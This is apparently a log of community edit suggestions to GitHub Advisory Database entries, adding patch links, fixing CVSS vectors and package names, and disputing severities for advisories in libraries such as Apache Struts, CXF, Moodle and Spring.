advisories/github-reviewed/2023/09/GHSA-j7hp-h8jx-5ppr/GHSA-j7hp-h8jx-5ppr.json
**Updates**
**Comments**
https://rustsec.org/advisories/RUSTSEC-2023-0061.html
=> [GHSA-j7hp-h8jx-5ppr] libwebp: OOB write in BuildHuffmanTable

advisories/github-reviewed/2022/11/GHSA-cg88-rpvp-cjv5/GHSA-cg88-rpvp-cjv5.json
**Updates**
- References
**Comments**
One of the URLs was not working: https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/grappler/utils/functions.cc#L221 (the 'https' phrase was doubled)
=> [GHSA-cg88-rpvp-cjv5] Out of bounds write in grappler in Tensorflow

advisories/github-reviewed/2023/08/GHSA-fh2r-99q2-6mmg/GHSA-fh2r-99q2-6mmg.json
**Updates**
- Description
**Comments**
Add link to webpki GHSA entry
=> [GHSA-fh2r-99q2-6mmg] rustls-webpki: CPU denial of service in certificate path building

advisories/github-reviewed/2023/09/GHSA-6qjf-7g3j-qx25/GHSA-6qjf-7g3j-qx25.json
**Updates**
- Description
**Comments**
Provide some more information on what is needed to use the attack vector and point out a way to block such attacks (CSP).
=> [GHSA-6qjf-7g3j-qx25] Neos CMS Cross Site Scripting vulnerability

advisories/github-reviewed/2023/09/GHSA-9mcr-873m-xcxp/GHSA-9mcr-873m-xcxp.json
The issue was fixed in `tungstenite` 0.20.1
Refs:
- https://github.com/snapview/tungstenite-rs/issues/376#issuecomment-1732149336
- https://github.com/snapview/tungstenite-rs/pull/379
=> [GHSA-9mcr-873m-xcxp] Add fixed version

advisories/github-reviewed/2023/09/GHSA-3qc2-v3hp-6cv8/GHSA-3qc2-v3hp-6cv8.json
**Updates**
- CVSS
- Severity
**Comments**
This isn't a reasonable analysis at all. The gist describes it in detail and it basically says: "if you convince a user to change javascript on the site, then javascript might run a lot."  https://gist.github.com/keeganparr1/1dffd3c017339b7ed5371ed3d81e6b2a
=> [GHSA-3qc2-v3hp-6cv8] sidekiq Denial of Service vulnerability

advisories/github-reviewed/2023/09/GHSA-9jfq-54vc-9rr2/GHSA-9jfq-54vc-9rr2.json
**Updates**
- Description
**Comments**
Uh, I wanted the record to show that this was about... another system, not distributed as the name `foreman` on RubyGems.
This is my very first attempt to send such feedback, hoping this is the right forum and format.
=> [GHSA-9jfq-54vc-9rr2] Foreman Transpilation Enables OS Command Injection

advisories/github-reviewed/2018/08/GHSA-gxpj-cx7g-858c/GHSA-gxpj-cx7g-858c.json
**Updates**
- Description
- References
**Comments**
Update ranges
=> [GHSA-gxpj-cx7g-858c] Regular Expression Denial of Service in debug

advisories/github-reviewed/2020/09/GHSA-8fw4-xh83-3j6q/GHSA-8fw4-xh83-3j6q.json
**Updates**
- References
**Comments**
v2.6.2: https://github.com/bpmn-io/diagram-js/commit/2565c40449379284a55163f290ec812db34244d1
v3.3.1: https://github.com/bpmn-io/diagram-js/commit/777fa06d70036daa9d02f3be6d0732cf4ccd8d6d
The developer started to escape the user-controlled input in search-pad: " fix(search-pad): prevent HTML injection. Given the apprioritate title and search text HTML injection was possible until now."
=> [GHSA-8fw4-xh83-3j6q] Cross-Site Scripting in diagram-js

advisories/github-reviewed/2022/05/GHSA-vm6r-4p4v-232x/GHSA-vm6r-4p4v-232x.json
**Updates**
**Comments**
Issue is patched
=> [GHSA-vm6r-4p4v-232x] October CMS CSRF 

advisories/github-reviewed/2022/05/GHSA-3p6c-9xhm-8x7h/GHSA-3p6c-9xhm-8x7h.json
**Updates**
**Comments**
Issue was patched
=> [GHSA-3p6c-9xhm-8x7h] October CMS XSS

advisories/github-reviewed/2022/05/GHSA-8vh6-8w76-v6m3/GHSA-8vh6-8w76-v6m3.json
**Updates**
**Comments**
Issue patched
=> [GHSA-8vh6-8w76-v6m3] October CMS File Upload Vulnerability

advisories/github-reviewed/2023/09/GHSA-m95q-7qp3-xv42/GHSA-m95q-7qp3-xv42.json
**Updates**
**Comments**
The patch is released
=> [GHSA-m95q-7qp3-xv42] Zod denial of service vulnerability

advisories/github-reviewed/2023/07/GHSA-w2h3-vvvq-3m53/GHSA-w2h3-vvvq-3m53.json
**Updates**
**Comments**
Underlying issue isn't fixed yet - https://github.com/tektoncd/pipeline/issues/6909
=> [GHSA-w2h3-vvvq-3m53] Pipelines do not validate child UIDs

advisories/github-reviewed/2023/09/GHSA-7fh5-64p2-3v2j/GHSA-7fh5-64p2-3v2j.json
**Updates**
- CWEs
- Description
**Comments**
This provides a security impact to the advisory, and assigns a CWE.
**Fixes**
#2820 
(See the discussion in #2820 for an explanation)
=> [GHSA-7fh5-64p2-3v2j] PostCSS line return parsing error

advisories/github-reviewed/2023/06/GHSA-89qm-hm2x-mxm3/GHSA-89qm-hm2x-mxm3.json
**Updates**
**Comments**
Security patch applied in 1.1.1 version
=> [GHSA-89qm-hm2x-mxm3] progressbar.js vulnerable to Prototype Pollution

advisories/github-reviewed/2022/05/GHSA-c75v-2vq8-878f/GHSA-c75v-2vq8-878f.json
**Updates**
- Description
**Comments**
Patch ba8da742e3b243e8f43d4c63aa842b44e14f2b09 was included in release 10.2.5
=> [GHSA-c75v-2vq8-878f] Cross site scripting in Angular

advisories/github-reviewed/2023/10/GHSA-rm7j-f5g5-27vv/GHSA-rm7j-f5g5-27vv.json
**Updates**
**Comments**
They have released a fixed version: https://github.com/stleary/JSON-java/issues/789
=> [GHSA-rm7j-f5g5-27vv] Denial of Service  in JSON-Java

advisories/github-reviewed/2023/10/GHSA-5mfx-4wcx-rv27/GHSA-5mfx-4wcx-rv27.json
**Updates**
**Comments**
[Version 1.10.2](https://github.com/Azure/azure-sdk-for-net/blob/main/sdk/identity/Azure.Identity/CHANGELOG.md#1102-2023-10-10) is the patched version. Versions earlier than that are impacted by the remote code execution vulnerability.
=> [GHSA-5mfx-4wcx-rv27] Azure Identity SDK Remote Code Execution Vulnerability

advisories/github-reviewed/2023/10/GHSA-67hx-6x53-jw92/GHSA-67hx-6x53-jw92.json
**Updates**
**Comments**
Vulnerability found
=> [GHSA-67hx-6x53-jw92] Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code

advisories/github-reviewed/2023/08/GHSA-prgp-w7vf-ch62/GHSA-prgp-w7vf-ch62.json
**Updates**
- Description
- References
**Comments**
Issue resolved
=> [GHSA-prgp-w7vf-ch62] LangChain vulnerable to arbitrary code execution

advisories/github-reviewed/2023/10/GHSA-fgq9-fc3q-vqmw/GHSA-fgq9-fc3q-vqmw.json
**Updates**
- Description
- References
**Comments**
The vulnerability cannot be reproduced and does not exist.
=> [GHSA-fgq9-fc3q-vqmw] dom4j XML Entity Expansion vulnerability

advisories/github-reviewed/2023/10/GHSA-6h8p-4hx9-w66c/GHSA-6h8p-4hx9-w66c.json
**Updates**
- Description
- References
**Comments**
Patched in:
https://github.com/langchain-ai/langchain/releases/tag/v0.0.329
https://github.com/langchain-ai/langchain/pull/12747
=> [GHSA-6h8p-4hx9-w66c] Langchain Server-Side Request Forgery vulnerability

advisories/github-reviewed/2021/09/GHSA-4jqc-8m5r-9rpr/GHSA-4jqc-8m5r-9rpr.json
**Updates**
**Comments**
set-value 3.0.3 backported the fix: https://github.com/jonschlinkert/set-value/compare/3.0.2...3.0.3
=> [GHSA-4jqc-8m5r-9rpr] Prototype Pollution in set-value

advisories/github-reviewed/2020/08/GHSA-gr4j-r575-g665/GHSA-gr4j-r575-g665.json
**Updates**
- CVSS
**Comments**
Wrong CVSS format make my Rust service crash lol.
=> [GHSA-gr4j-r575-g665] Cross-Site Scripting in highcharts

advisories/github-reviewed/2023/11/GHSA-3vmm-7h4j-69rm/GHSA-3vmm-7h4j-69rm.json
**Updates**
- CWEs
**Comments**
The used CWE "Authentication Bypass by Capture-replay (CWE-294)" seems to be wrong - this vulnerability does not concern network traffic, nor encryption - this is out of scope for the particular application.
Our initial suggestion was "Authentication Bypass by Assumed-Immutable Data (CWE-302)". If that does not fit, it just would be the very generic "Weak Authentication (CWE-1390)".
=> [GHSA-3vmm-7h4j-69rm] TYPO3 vulnerable to Weak Authentication in Session Handling

advisories/github-reviewed/2023/11/GHSA-w9cp-3x79-2p8p/GHSA-w9cp-3x79-2p8p.json
**Updates**
- CWEs
**Comments**
added cwe as per vulnerablity description
=> [GHSA-w9cp-3x79-2p8p] transmute-core unsafe YAML deserialization vulnerability

advisories/github-reviewed/2021/12/GHSA-23fp-fmrv-f5px/GHSA-23fp-fmrv-f5px.json
**Updates**
**Comments**
Package will be 'strapi-admin' instead of 'strapi' : check filepath, package.json : https://github.com/strapi/strapi/blob/c0c191c08f05fe10d7a6b1bf9475c1a651a89362/packages/strapi-admin/package.json#L2C11-L2C23
=> [GHSA-23fp-fmrv-f5px] Uncontrolled Resource Consumption in strapi

advisories/github-reviewed/2023/11/GHSA-v5gj-fx3g-hcpw/GHSA-v5gj-fx3g-hcpw.json
**Updates**
- References
**Comments**
added fix commit
=> [GHSA-v5gj-fx3g-hcpw] SQL injection in Apache Submarine

advisories/github-reviewed/2022/12/GHSA-7gpw-frph-fwrg/GHSA-7gpw-frph-fwrg.json
**Updates**
- References
**Comments**
Add patch commit for v2.2.1: https://github.com/bihor/fp_masterquiz/commit/fce4ec64600df3f38cacc9a86ba2bd063a51e140
The commit msg shows its goal: "Security fix. Please update as soon as possible". The code change also reflects the purpose to avoid sensitive info disclose.
=> [GHSA-7gpw-frph-fwrg] TYPO3-EXT-SA-2022-018: Multiple vulnerabilities in extension "Master-Quiz" (fp_masterquiz)

advisories/github-reviewed/2023/11/GHSA-9jjc-grg5-67gj/GHSA-9jjc-grg5-67gj.json
**Updates**
**Comments**
add source code location
=> [GHSA-9jjc-grg5-67gj] SQL injection vulnerability in Meshery

advisories/github-reviewed/2021/02/GHSA-m56g-3g8v-2rxw/GHSA-m56g-3g8v-2rxw.json
**Updates**
**Comments**
I know this is withdrawn, but it is not referring to the correct package name.
=> [GHSA-m56g-3g8v-2rxw] XSS in Adminer

advisories/github-reviewed/2022/08/GHSA-325v-g5vx-whxc/GHSA-325v-g5vx-whxc.json
**Updates**
**Comments**
Add more specific package name
=> [GHSA-325v-g5vx-whxc] LibreNMS vulnerable to Cross-Site Scripting (XSS)

advisories/github-reviewed/2022/05/GHSA-pg2w-x9wp-vw92/GHSA-pg2w-x9wp-vw92.json
**Updates**
**Comments**
2.6.0 release notes (https://pypi.org/project/requests/2.6.0/) shows that it fixed this issue.
=> [GHSA-pg2w-x9wp-vw92] Python Requests Session Fixation

advisories/github-reviewed/2023/11/GHSA-5phw-6g3r-55xx/GHSA-5phw-6g3r-55xx.json
**Updates**
**Comments**
add source code location
=> [GHSA-5phw-6g3r-55xx] Cross-site Scripting in OpenCRX

advisories/github-reviewed/2023/11/GHSA-vmq6-5m68-f53m/GHSA-vmq6-5m68-f53m.json
**Updates**
- References
**Comments**
Please see:
- https://github.com/qos-ch/logback/issues/745#issuecomment-1836227158
- https://logback.qos.ch/news.html#1.2.13
=> [GHSA-vmq6-5m68-f53m] logback serialization vulnerability

advisories/github-reviewed/2020/09/GHSA-2p62-c4rm-mr72/GHSA-2p62-c4rm-mr72.json
**Updates**
- CVSS
**Comments**
Invalid CVSS score vector (trailing slash).
=> [GHSA-2p62-c4rm-mr72] Malicious Package in another-date-picker

advisories/github-reviewed/2020/09/GHSA-x6m6-5hrf-fh6r/GHSA-x6m6-5hrf-fh6r.json
**Updates**
- CVSS
**Comments**
Invalid CVSS3 vector string (trailing slash).
=> [GHSA-x6m6-5hrf-fh6r] Denial of Service in markdown-it-toc-and-anchor

advisories/github-reviewed/2020/09/GHSA-r5xw-q988-826m/GHSA-r5xw-q988-826m.json
**Updates**
- CVSS
**Comments**
Invalid CVSS3 vector string (trailing slash).
=> [GHSA-r5xw-q988-826m] Remote Memory Exposure in mongoose

advisories/github-reviewed/2020/09/GHSA-7cvf-p83w-48q6/GHSA-7cvf-p83w-48q6.json
**Updates**
- CVSS
**Comments**
Invalid CVSS3 vector string (trailing slash).
=> [GHSA-7cvf-p83w-48q6] Malicious Package in beffer-xor

advisories/github-reviewed/2020/09/GHSA-6fcr-9h9g-23fq/GHSA-6fcr-9h9g-23fq.json
**Updates**
- CVSS
**Comments**
Invalid CVSS3 vector string (trailing slash).
=> [GHSA-6fcr-9h9g-23fq] Denial of Service in ipfs-bitswap

advisories/github-reviewed/2018/10/GHSA-8vfm-4388-6rpc/GHSA-8vfm-4388-6rpc.json
**Updates**
- References
**Comments**
reference link，add some patch links which all related to CVE-2018-8027
=> [GHSA-8vfm-4388-6rpc] Apache is vulnerable to XXE in XSD validation processor

advisories/github-reviewed/2021/11/GHSA-7h26-63m7-qhf2/GHSA-7h26-63m7-qhf2.json
**Updates**
- CVSS
**Comments**
This vulnerability is not picked up for the composer ecosystem
=> [GHSA-7h26-63m7-qhf2] HTML comments vulnerability allowing to execute JavaScript code

advisories/github-reviewed/2022/05/GHSA-x9fv-c87w-55wc/GHSA-x9fv-c87w-55wc.json
**Updates**
- References
**Comments**
Add some patch links and location link related to CVE-2014-4330 which fixed in multi-branch.
=> [GHSA-x9fv-c87w-55wc] Improper Control of Generation of Code in Apache Camel

advisories/github-reviewed/2022/05/GHSA-9wcx-326r-7j7w/GHSA-9wcx-326r-7j7w.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2011-4905
=> [GHSA-9wcx-326r-7j7w] Denial of Service in Apache ActiveMQ

advisories/github-reviewed/2022/05/GHSA-23cr-5hr4-rgwv/GHSA-23cr-5hr4-rgwv.json
**Updates**
- References
**Comments**
Add source link and patch link related to CVE-2015-6524.
=> [GHSA-23cr-5hr4-rgwv] Improper Input Validation in Apache ActiveMQ

advisories/github-reviewed/2022/05/GHSA-72m6-23ff-7q26/GHSA-72m6-23ff-7q26.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2014-3612
=> [GHSA-72m6-23ff-7q26] Improper Authentication in Apache WSS4J

advisories/github-reviewed/2022/05/GHSA-q9hr-3pg4-3jp4/GHSA-q9hr-3pg4-3jp4.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2015-5254 which fixed in multi-branch.
=> [GHSA-q9hr-3pg4-3jp4] Improper Input Validation in Apache ActiveMQ

advisories/github-reviewed/2018/10/GHSA-m9w8-v359-9ffr/GHSA-m9w8-v359-9ffr.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2018-11775.
=> [GHSA-m9w8-v359-9ffr] Improper Certificate Validation in Apache activemq-client

advisories/github-reviewed/2022/05/GHSA-55j7-f5wf-43m4/GHSA-55j7-f5wf-43m4.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2012-3451
=> [GHSA-55j7-f5wf-43m4] Remote web-service operation execution in Apache CXF

advisories/github-reviewed/2022/05/GHSA-xf9f-32gh-h2w4/GHSA-xf9f-32gh-h2w4.json
**Updates**
- References
**Comments**
Add some patch links and source code link related to CVE-2012-4633 which fixed in multi-branch.
=> [GHSA-xf9f-32gh-h2w4] Improper Authentication in Apache CXF

advisories/github-reviewed/2022/05/GHSA-p5c5-6564-vvr8/GHSA-p5c5-6564-vvr8.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2013-0239 which fixed in multi-branch.
=> [GHSA-p5c5-6564-vvr8] Improper Authentication in Apache CXF

advisories/github-reviewed/2022/05/GHSA-38x2-fp9m-87mx/GHSA-38x2-fp9m-87mx.json
**Updates**
- References
**Comments**
Add source code link and patch link related to CVE-2014-0034
=> [GHSA-38x2-fp9m-87mx] Improper Input Validation in Apache CXF

advisories/github-reviewed/2022/05/GHSA-v45r-rj5x-hpg2/GHSA-v45r-rj5x-hpg2.json
**Updates**
- References
**Comments**
Add source code link and patch related to CVE-2014-0035.
=> [GHSA-v45r-rj5x-hpg2] Cleartext Transmission of Sensitive Information in Apache CXF

advisories/github-reviewed/2022/05/GHSA-5wqf-h3r3-gxvh/GHSA-5wqf-h3r3-gxvh.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2014-0109
=> [GHSA-5wqf-h3r3-gxvh] Uncontrolled Resource Consumption in Apache CXF

advisories/github-reviewed/2023/11/GHSA-fccv-jmmp-qg76/GHSA-fccv-jmmp-qg76.json
**Updates**
**Comments**
Improve visibility for org.apache.tomcat.embed:tomcat-embed-core
Reasoning -> fixed components are also part of tomcat-embed-core package:
(11.0.x) https://github.com/apache/tomcat/commit/6f181e1062a472bc5f0234980f66cbde42c1041b
(10.1.x) https://github.com/apache/tomcat/commit/b5776d769bffeade865061bc8ecbeb2b56167b08
(9.0.x) https://github.com/apache/tomcat/commit/7a2d8818fcea0b51747a67af9510ce7977245ebd
(8.5.x) https://github.com/apache/tomcat/commit/aa92971e879a519384c517febc39fd04c48d4642
=> [GHSA-fccv-jmmp-qg76] Apache Tomcat Improper Input Validation vulnerability

advisories/github-reviewed/2022/05/GHSA-5xf9-3v63-ww6f/GHSA-5xf9-3v63-ww6f.json
**Updates**
- References
**Comments**
Add source code link and patch link related to CVE-2014-0110.
=> [GHSA-5xf9-3v63-ww6f] Uncontrolled Resource Consumption in Apache CXF

advisories/github-reviewed/2022/05/GHSA-gw5j-77f9-v2g2/GHSA-gw5j-77f9-v2g2.json
**Updates**
- References
**Comments**
Add source code link and patch related to CVE-2014-3584
=> [GHSA-gw5j-77f9-v2g2] Loop with Unreachable Exit Condition in Apache CXF

advisories/github-reviewed/2022/05/GHSA-vw2c-5wph-v92r/GHSA-vw2c-5wph-v92r.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2016-6812 which fixed in multi-branch.
=> [GHSA-vw2c-5wph-v92r] Improper Neutralization of Input During Web Page Generation in Apache CXF

advisories/github-reviewed/2022/05/GHSA-7vgj-8mw4-hg8r/GHSA-7vgj-8mw4-hg8r.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2017-12624
=> [GHSA-7vgj-8mw4-hg8r] Improper Input Validation in Apache CXF

advisories/github-reviewed/2022/05/GHSA-qc2p-q7x9-v64p/GHSA-qc2p-q7x9-v64p.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2017-3156.
=> [GHSA-qc2p-q7x9-v64p] Covert Timing Channel in Apache CXF

advisories/github-reviewed/2022/05/GHSA-hgg6-8x62-m9gf/GHSA-hgg6-8x62-m9gf.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2017-5653
=> [GHSA-hgg6-8x62-m9gf] Improper Certificate Validation in Apache CXF

advisories/github-reviewed/2022/05/GHSA-v936-x3j5-c76j/GHSA-v936-x3j5-c76j.json
**Updates**
- References
**Comments**
Add source code link and patch links related to CVE-2017-5656.
=> [GHSA-v936-x3j5-c76j] Session Fixation in Apache CXF

advisories/github-reviewed/2022/05/GHSA-f5ch-36rg-vfcc/GHSA-f5ch-36rg-vfcc.json
**Updates**
**Comments**
https://nvd.nist.gov/vuln/detail/CVE-2017-7662
=> [GHSA-f5ch-36rg-vfcc] Cross-Site Request Forgery in Apache CXF Fediz

advisories/github-reviewed/2022/05/GHSA-4wrr-9h5r-m92w/GHSA-4wrr-9h5r-m92w.json
**Updates**
- References
**Comments**
Add source code link and some patch links related to CVE-2012-0391.
=> [GHSA-4wrr-9h5r-m92w] Apache Struts Remote Java Code Execution

advisories/github-reviewed/2022/05/GHSA-mwrx-hx6x-3hhv/GHSA-mwrx-hx6x-3hhv.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2012-0838.
=> [GHSA-mwrx-hx6x-3hhv] Apache Struts Code injection due to conversion error

advisories/github-reviewed/2022/05/GHSA-hrgc-54mv-58gv/GHSA-hrgc-54mv-58gv.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2012-4387.
=> [GHSA-hrgc-54mv-58gv] Denial of service in Apache Struts

advisories/github-reviewed/2022/05/GHSA-737w-mh58-cxjp/GHSA-737w-mh58-cxjp.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2013-1966 which fixed in multi-branch.
=> [GHSA-737w-mh58-cxjp] Arbitrary code execution in Apache Struts

advisories/github-reviewed/2022/05/GHSA-7ghm-rpc7-p7g5/GHSA-7ghm-rpc7-p7g5.json
**Updates**
- References
**Comments**
Add some patch link related to CVE-2013-2115 which fixed in multi-branch.
=> [GHSA-7ghm-rpc7-p7g5] Code injection in Apache Struts

advisories/github-reviewed/2022/05/GHSA-gqqm-564f-vvxq/GHSA-gqqm-564f-vvxq.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2013-2134 which fixed in multi-branch.
=> [GHSA-gqqm-564f-vvxq] Arbitrary code execution in Apache Struts 2

advisories/github-reviewed/2022/05/GHSA-pw8r-x2qm-3h5m/GHSA-pw8r-x2qm-3h5m.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2013-2135 which fixed in multi-branch.
=> [GHSA-pw8r-x2qm-3h5m] Arbitrary code execution in Apache Struts 2

advisories/github-reviewed/2022/05/GHSA-rpj9-r897-wc6q/GHSA-rpj9-r897-wc6q.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2013-2248.
=> [GHSA-rpj9-r897-wc6q] Open redirect in Apache Struts

advisories/github-reviewed/2022/05/GHSA-47qp-8v9g-39hp/GHSA-47qp-8v9g-39hp.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2013-2251.
=> [GHSA-47qp-8v9g-39hp] Code injection in Apache Struts

advisories/github-reviewed/2022/05/GHSA-j7h6-xr7g-m2c5/GHSA-j7h6-xr7g-m2c5.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2013-4316.
=> [GHSA-j7h6-xr7g-m2c5] Code injection in Apache Struts

advisories/github-reviewed/2022/05/GHSA-vrwc-qjmw-5rjm/GHSA-vrwc-qjmw-5rjm.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2014-0094
=> [GHSA-vrwc-qjmw-5rjm] ClassLoader manipulation in Apache Struts

advisories/github-reviewed/2022/05/GHSA-h4v9-jf2r-9h6m/GHSA-h4v9-jf2r-9h6m.json
**Updates**
- References
**Comments**
Add source code link and patch link related to CVE-2014-7809.
=> [GHSA-h4v9-jf2r-9h6m] Cross-Site Request Forgery in Apache Struts

advisories/github-reviewed/2022/05/GHSA-q2cg-xf9p-h457/GHSA-q2cg-xf9p-h457.json
**Updates**
- References
**Comments**
Add source code link and patch link related to CVE-2015-1831.
=> [GHSA-q2cg-xf9p-h457] Incomplete exclude pattern in Apache Struts

advisories/github-reviewed/2022/05/GHSA-876p-4wgc-75rx/GHSA-876p-4wgc-75rx.json
**Updates**
- References
**Comments**
Add links related to CVE-2016-0785.
=> [GHSA-876p-4wgc-75rx] Apache Struts RCE Vulnerability

advisories/github-reviewed/2022/05/GHSA-2j4q-9fff-236j/GHSA-2j4q-9fff-236j.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2016-2162.
=> [GHSA-2j4q-9fff-236j] Apache Struts XSS Vulnerability

advisories/github-reviewed/2022/05/GHSA-m3x6-9v6h-4g28/GHSA-m3x6-9v6h-4g28.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2016-4003.
=> [GHSA-m3x6-9v6h-4g28] Cross-site Scripting in Apache Struts

advisories/github-reviewed/2022/05/GHSA-4prj-vw9j-v6pr/GHSA-4prj-vw9j-v6pr.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2016-4438.
=> [GHSA-4prj-vw9j-v6pr] Arbitrary code execution in Apache Struts 2

advisories/github-reviewed/2022/05/GHSA-wm8w-qp2f-728q/GHSA-wm8w-qp2f-728q.json
**Updates**
- References
**Comments**
Add patch link and source code link related to CVE-2016-4433.
=> [GHSA-wm8w-qp2f-728q] Apache Struts Open Redirect

advisories/github-reviewed/2022/05/GHSA-xg75-68x3-7p3q/GHSA-xg75-68x3-7p3q.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2016-4465.
=> [GHSA-xg75-68x3-7p3q] Possible DoS attack when using URLValidator

advisories/github-reviewed/2022/05/GHSA-44hv-jjx7-qfjg/GHSA-44hv-jjx7-qfjg.json
**Updates**
- References
**Comments**
Add patch links related to CVE-2016-6795.
=> [GHSA-44hv-jjx7-qfjg] Path Traversal in Apache Struts

advisories/github-reviewed/2022/05/GHSA-86vq-8qhc-5rqw/GHSA-86vq-8qhc-5rqw.json
**Updates**
- References
**Comments**
Add source code link and  patch links related to CVE-2016-8738.
=> [GHSA-86vq-8qhc-5rqw] Possible DoS attack when using URLValidator

advisories/github-reviewed/2022/05/GHSA-4prh-gqw8-rgh5/GHSA-4prh-gqw8-rgh5.json
**Updates**
- References
**Comments**
Add some patch links related to CVE-2007-0450.
=> [GHSA-4prh-gqw8-rgh5] Apache Tomcat Directory Traversal

advisories/github-reviewed/2023/12/GHSA-mvc8-6ffp-jrx5/GHSA-mvc8-6ffp-jrx5.json
**Updates**
**Comments**
Fix package names.
=> [GHSA-mvc8-6ffp-jrx5] Authorization bypass in Quarkus

advisories/github-reviewed/2023/06/GHSA-qcm3-vfq5-wfr2/GHSA-qcm3-vfq5-wfr2.json
**Updates**
**Comments**
https://github.com/jgarber/redcloth/compare/v4.3.2...v4.3.3
Addressed in the most recent change to this gem (the first change in 7+ years!)
=> [GHSA-qcm3-vfq5-wfr2] RedCloth Regular Expression Denial of Service issue

advisories/github-reviewed/2023/12/GHSA-qphf-w3cq-jpmx/GHSA-qphf-w3cq-jpmx.json
**Updates**
- CVSS
- Severity
**Comments**
This shouldn't be flagged as a vulnerability at all. Per https://github.com/seancfoley/IPAddress/issues/118#issuecomment-1876043773, an infinite loop case exists only for cases that the developer supplies invalid arguments. There is no security model being violated here, and no implicit requirement that all functions must halt for contrived inputs.
=> [GHSA-qphf-w3cq-jpmx] IPAddress Infinite Loop vulnerability

advisories/github-reviewed/2018/09/GHSA-7mvr-5x2g-wfc8/GHSA-7mvr-5x2g-wfc8.json
**Updates**
- Description
**Comments**
I saw the fix for https://github.com/github/advisory-database/pull/3282/files
=> [GHSA-7mvr-5x2g-wfc8] Bootstrap Cross-site Scripting vulnerability

advisories/github-reviewed/2024/01/GHSA-r4q3-7g4q-x89m/GHSA-r4q3-7g4q-x89m.json
**Updates**
**Comments**
Changed versions affected & patched according to the original report at Spring. The current state results in false positives along the build chain, leading developers to patch formerly secure versions towards a vulnerable one!
Looking forward to feedback about this change!
=> [GHSA-r4q3-7g4q-x89m] Spring Framework server Web DoS Vulnerability

advisories/github-reviewed/2022/05/GHSA-27j2-c838-c3qg/GHSA-27j2-c838-c3qg.json
**Updates**
**Comments**
update vvr.
=> [GHSA-27j2-c838-c3qg] Moodle Arbitrary File Read via XML External Entity vulnerability

advisories/github-reviewed/2022/05/GHSA-3m99-h3hp-w9j7/GHSA-3m99-h3hp-w9j7.json
**Updates**
**Comments**
update vrr.
=> [GHSA-3m99-h3hp-w9j7] Moodle remote code execution via quiz questions

advisories/github-reviewed/2022/05/GHSA-cp39-43xr-2wrp/GHSA-cp39-43xr-2wrp.json
**Updates**
- Summary
**Comments**
update info for source code location
=> [GHSA-cp39-43xr-2wrp] Moodle XSS Vulnerability

advisories/github-reviewed/2022/05/GHSA-4mgv-m5cm-f9h7/GHSA-4mgv-m5cm-f9h7.json
**Updates**
- Description
**Comments**
Action marketplace link not working
=> [GHSA-4mgv-m5cm-f9h7] Vault GitHub Action did not correctly mask multi-line secrets in output

advisories/github-reviewed/2022/05/GHSA-hjrj-7wcj-7j3c/GHSA-hjrj-7wcj-7j3c.json
**Updates**
- References
**Comments**
add patch commit: https://github.com/moodle/moodle/commit/4323a973d57a41e19e039a850ad71ebcabae73c1. 
the commit msg has shown it's a fix for `MDL-52072`. 
update vvr as well.
=> [GHSA-hjrj-7wcj-7j3c] Moodle sensitive information disclosure

advisories/github-reviewed/2022/05/GHSA-5xp2-rv4h-mm2q/GHSA-5xp2-rv4h-mm2q.json
**Updates**
**Comments**
update source code location.
=> [GHSA-5xp2-rv4h-mm2q] Moodle Open Redirect Vulnerability

advisories/github-reviewed/2024/01/GHSA-297x-2qf3-jrj3/GHSA-297x-2qf3-jrj3.json
**Updates**
**Comments**
added repo for source code.
=> [GHSA-297x-2qf3-jrj3] Unsafe yaml deserialization in llama-hub

advisories/github-reviewed/2024/01/GHSA-frxm-v7q3-v2wv/GHSA-frxm-v7q3-v2wv.json
**Updates**
**Comments**
added url for source code repo
=> [GHSA-frxm-v7q3-v2wv] Insertion of Sensitive Information into Log File in OWASP DependencyCheck

advisories/github-reviewed/2020/09/GHSA-2cf5-4w76-r9qv/GHSA-2cf5-4w76-r9qv.json
**Updates**
- CVSS
- CWEs
**Comments**
Adding a CVSS Score and CWE based on the description.
=> [GHSA-2cf5-4w76-r9qv] Arbitrary Code Execution in handlebars

advisories/github-reviewed/2020/09/GHSA-6x33-pw7p-hmpq/GHSA-6x33-pw7p-hmpq.json
**Updates**
- CVSS
- CWEs
**Comments**
Adding a CVSS and CWE for this vulnerability.
=> [GHSA-6x33-pw7p-hmpq] Denial of Service in http-proxy

advisories/github-reviewed/2022/05/GHSA-rqph-vqwm-22vc/GHSA-rqph-vqwm-22vc.json
**Updates**
**Comments**
The affected package is spring-messaging, not spring-core.
You can verify that the fixing commit changes code in spring-messaging: https://github.com/spring-projects/spring-framework/commit/dc2947c52df18d5e99cad03383f7d6ba13d031fd
=> [GHSA-rqph-vqwm-22vc] Allocation of Resources Without Limits or Throttling in Spring Framework

advisories/github-reviewed/2023/03/GHSA-564r-hj7v-mcr5/GHSA-564r-hj7v-mcr5.json
**Updates**
**Comments**
The affected package is spring-expression, not spring-core.
You can verify that the fixing commit changes code in spring-expression: https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1
=> [GHSA-564r-hj7v-mcr5] Spring Framework vulnerable to denial of service via specially crafted SpEL expression

advisories/github-reviewed/2022/05/GHSA-hh26-6xwr-ggv7/GHSA-hh26-6xwr-ggv7.json
**Updates**
**Comments**
